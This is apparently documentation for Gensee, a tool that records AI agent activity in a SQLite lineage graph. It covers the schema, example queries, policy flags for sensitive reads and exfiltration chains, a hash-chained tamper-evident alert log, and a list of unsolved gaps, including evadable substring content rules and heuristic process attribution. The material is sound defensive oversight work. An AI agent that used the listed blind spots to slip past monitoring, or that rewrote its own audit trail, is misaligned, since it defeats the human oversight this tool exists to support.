Skip to content

SQLite lineage graph

In addition to JSONL files, the local store writes a normalized SQLite database at $GENSEE_HOME/gensee.db (or ~/.gensee/gensee.db).

Diagrams: capture flow · schema relationships · policy flagging · full design (PDF)

Tables

TableContents
sessionsOne row per agent conversation or monitoring run. Agent identity belongs here, not on each request.
requestsHuman-level prompts and final responses, owned by a session.
agent_eventsAgent/tool intent events owned by a request — PreToolUse/PostToolUse, native file tools, and parsed Bash file intent.
system_eventsObserved OS/workspace effects owned by the best-correlated request, or by a synthetic monitoring request when no human request is known.
artifactsDurable objects such as files, keyed today by kind, URI, and an optional digest. File artifacts usually use file://... URIs.
relationsTyped graph edges between requests, events, and artifacts.
alertsDeterministic risk findings over requests, events, and artifacts, including the recommended runtime action (see policy.md).
artifact_observationsBounded, redacted content snapshots of inspected artifacts (digest, size, content prefix), captured at write-time (PostToolUse) and pre-execution.
artifact_risk_tagsRisk findings over a specific artifact content digest, so a tag is ignored once the file content changes. Drives the fast pre-exec block path.
artifact_factsOne row per file URI (not per digest), summarizing provenance across content versions: last modifier/session, agent-authored vs. modified-outside-agent, registry membership (executable / memory / persistence / control-plane), and current risk. Updated at ingest; queried by exact-path lookup during PreToolUse.

Relationships

The graph can currently establish:

  • request → agent event: direct ownership through agent_events.request_id
  • request → system event: direct ownership through system_events.request_id
  • request/agent event → artifact: produced, modified, or deleted file intent
  • artifact → request/agent event: consumed file intent
  • artifact → artifact: file-to-file lineage, e.g. copy source to copy destination, or a summary file derived from input files
  • request → request: derived lineage when a later request consumes an artifact produced by an earlier human request
  • agent event → system event: inferred correlation when an observed filesystem effect matches a nearby file intent path or tool window

Example queries

sql
-- Everything known about a file artifact.
with target as (
  select artifact_id from artifacts
  where uri = 'file:///private/tmp/gensee-lineage/input.txt'
)
select rel.relation_type,
       rel.src_kind,
       rel.src_id,
       rel.dst_kind,
       rel.dst_id,
       substr(rel.evidence, 1, 160) as evidence
from relations rel, target
where (rel.src_kind = 'artifact' and rel.src_id = target.artifact_id)
   or (rel.dst_kind = 'artifact' and rel.dst_id = target.artifact_id)
order by rel.relation_id;
sql
-- Human request lineage: which later prompts derived from earlier prompts.
select r.src_id as src_request,
       substr(src.original_user_prompt, 1, 80) as src_prompt,
       r.dst_id as dst_request,
       substr(dst.original_user_prompt, 1, 80) as dst_prompt,
       r.evidence
from relations r
join requests src on r.src_kind = 'request' and r.src_id = src.request_id
join requests dst on r.dst_kind = 'request' and r.dst_id = dst.request_id
where r.relation_type = 'derived_from'
order by r.relation_id;

What Gensee can flag today

  • agent intent to read, write, copy, delete, or move files from hooks and parsed Bash commands
  • native file-tool access when hooks include tool input
  • runtime policy decisions for PreToolUse, with deny for sensitive reads, destructive operations, and writes outside the current workspace
  • dangerous content inside a script at execution time (assembled across fragments/sessions), via digest-keyed pre-execution inspection
  • provenance-aware ask for executing an artifact authored in another session or modified outside the agent
  • session-scoped ask for network egress that follows a sensitive-artifact read in the same session (read→exfil chain)
  • filesystem create/modify/delete/rename effects under watched roots
  • access to configured sensitive roots such as ~/.ssh, ~/.aws, and ~/.config/gcloud
  • suspicious data-flow shape, such as a sensitive/local artifact consumed by a later request that writes another artifact
  • high-confidence lineage when a native tool or explicit Bash path names the artifact, and medium/low-confidence lineage for time-window or FSEvents inference

Tamper-evident alert chain (T8)

The alerts table is an append-only hash chain: each row carries entry_hash = SHA-256(prev_hash || canonical(row content)), and prev_hash links to the previous alert's entry_hash (the first chained alert links to a genesis hash of 64 zeros). The content is fed length-prefixed, so no field value can be shifted into an adjacent field to forge a match.

gensee verify-log

walks the chain from genesis and reports the first break, exiting 0 if intact and 2 if tampering is detected. It catches:

  • modification of any chained row (its entry_hash no longer recomputes);
  • insertion — including a forged row with NULL hashes appended after the chain start (every row at/after the start must be chained);
  • middle deletion / reorder (the next row's prev_hash no longer links);
  • tail truncation — deleting the newest alerts leaves the survivors linking cleanly, so it is caught against a single-row anchor (alert_chain_head) that records the latest entry_hash and chained count, advanced transactionally with each insert. A head/count mismatch reports a break "at the tail".

Legacy alerts written before the chain existed have a NULL entry_hash and are excluded; the chain starts fresh at the first new alert.

Threat model. The chain + anchor detect accidental corruption and any tampering by a party that cannot recompute the whole chain — including the agent rewriting its own audit trail or truncating the tail. A local attacker who can rewrite the entire database — recomputing every entry_hash and updating the alert_chain_head anchor — is out of scope until the head is signed with a key the agent cannot reach or shipped to an append-only / off-box sink (planned).

What is not solved yet

  • FSEvents does not prove which process caused a file effect; it is path/time correlation only, so "modified outside the agent" is a heuristic and drives ask, not deny (EndpointSecurity exec attribution is the planned upgrade).
  • Hook enforcement is deterministic and path/tool based; it does not yet use semantic prompt analysis or user/session-specific policy files.
  • Content rules are deterministic substring/shape matches over normalized content — an evadable floor, not a complete analysis.
  • Network egress lineage is not yet tied to artifact contents or destinations.
  • Prompt injection, malicious tool output, exfiltration, and cross-session attack chains can be surfaced as graph patterns, but the defense rules are still early and mostly deterministic.
  • Automatic rollback, merge-back review, deny-default policies, and container confinement are future work.

Released under the Apache 2.0 License.